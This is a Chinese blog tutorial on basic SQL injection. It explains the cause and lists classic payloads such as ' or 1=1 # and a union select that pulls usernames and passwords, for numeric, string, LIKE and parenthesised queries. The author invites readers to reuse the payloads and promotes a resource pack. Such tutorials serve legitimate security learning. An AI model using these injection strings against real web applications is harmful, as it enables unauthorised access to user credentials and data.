渗透测试SQL注入之【常规的SQL注入语句】这个渗透测试知识点教会你如何去做一些常规的sql注入


什么是SQL注入

SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,_没有对客户端(比如浏览器等)提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或_系统命令。

  1. 简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作

  2. 查找注入点一句话简单概括就是:前端页面上所有提交数据的地方,不管是登录、注册、留言板、评论区、分页等等地方,只要是提交数据给后台,后台拿着该数据和数据库交互了,那么这个地方就可能存在注入点


字符类型注入

xxx’ or 1=1 #

select id,email from member where username=‘=xx’ or 1=1 #’

转化成True 查询所有username

select id,email from member where username= True #’

’ 处于前面闭合状态 – # 注释得作用

select id,email form member where username = “vince”


URL编码

url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码(移去那些不能传送的字符,将数据排行等等)作为URL的一部分或者分离地发给服务器。不管哪种情况,在服务器端的表单输入格式样子像这样:

  1. 当 URL 路径或者查询参数中,带有中文或者特殊字符的时候,就需要对 URL 进行编码

  2. 采用ASCII十六进制编码格式)。

  3. URL 编码的原则是使用安全字符去表示那些不安全的字符。

  4. 安全字符,值的是没有特殊用途或者特殊意义的字符。 Key=Value

  5. Ascill编码转转化成对应得数字

工具:

小葵工具 URL编码 也可以存在于在线编码格式

URL种得空格处理:

在URL中出现空格以+得方式来处理 URL get请求不能出现空格

Get UIL种 不能使用#号 只能使用—注释符号


联合注入查询 Union

多表联合查询 不同表之间得查询:

正常语句:

  1. select id,username from member where username=‘vince’;

构造语句:

  1. xxx’ union select username,password from users #’

  2. 注意一点:union为联合查询,但是union后面的select__查询的字段数量,必须和union前面的select查询字段个数相同,这是union的特点。

  3. union select 联合查询 # 关系型数据库 redis非关系型的是不能用union select的

联合注入语句: 可以查任何表得数据 至于表明列名称 列得长度需要特别注意数量 多了少了都不行这个需要尝试。

’ union select username,password from users #

select id,email from member where username=‘’ union select username,password from users #’


我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

简单常用sql注入语句

引号测试,加了引号如果报错,证明存在注入点

  1. 单引号闭合数据:$query=“select id,email from member where username=‘vince’”; 用

单引号测试,会报错,双引号测试查不到数据,不报错

  1. 双引号闭合数据:$query=‘select id,email from member where username=“vince”’; 用

双引号测试,会报错,单引号测试查不到数据,不报错

or 1=1 一个条件为真,即为真,真的效果就是查询到表中所有数据

where id=1 and 1=1 两个条件为真才为真,查询结果和不加1=1一样,and 1=2 一个条件为假,即为

假,查询条件为假,什么数据也没有,两个结合起来可以判断是否存在注入点。

SQL注入以及数据类型分类有哪几种?

这个是面试经常问道的:

主要分为如下四类:数字型、字符型、搜索型、xx型

数字类型:

select username,id from member where id=1;

1 or 1=1;

字符型:

select id,usernamefrom member where username=‘vince or 1=1’;

select id email from member where username = ‘vince’

发现:这个语句的 vince or 1=1 是直接被认作字符串,我们在vince后面添加单引号来闭合vince,再在1=1后面添加注释#来消除掉后面的单引号。

#和–是mysql的sql语句注释符号,这样来完成一个SQL语句的拼接合法性。完整的语句为 select id,email from member where username=‘vince’ or 1=1#‘; ,我们回到pikachu平台输入 vince’ or 1=1#


搜索性注入 xx形式注入

搜索性注入:

Select id,email from member where username like ‘%vin’

Select id,email from member where username like ‘vin%’

Select id,email from member where username like ‘%vin%’

select username,id,email from member where username like ‘%%’ or 1=1 #%’

注意: 这里的 %’ or 1=1 #%’ 虽然单引号可以闭合 但是很多时候还是需要闭合%

也就是搜索性要多注意%的闭合

%%闭合也就是为了查询到更多的数据

  • %xxxx%’ or 1=1 #%’

或者

  • xxxx%’ or 1=1 #%’

XX性注入:

select * from member where username=(‘vince’) ;

select * from member where username=(‘xx’) or 1=1;

select id,email from member where username=(‘’) or 1=1 #')

‘) or 1=1 #’)

Xx注入 注意小括号的闭合状态

以上就是基本的数据类型注入 数字 字符 搜索 xx 注入类型

最后:

大家明白什么是sql注入 以及常规的sql注入语句类型了吧! 文中的pyload自行拿去用! 至于如何试验 自己去用虚拟机搭建一个靶场就可以进行测试学习了,靶场有很多这个自己百度吧! 如果不会搭建靶场或者没有靶场源码的改天有空我在写一个搭建靶场的文章以及分享靶场源码吧 ~ 好了写道这里了 喜欢的点个赞吧 哈哈 后面有空或许在这边文章上添加几个示例便于大家学习 ~ 最后就是sql注入的高阶手法还有很多,后面有空再分享一二吧 ~

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值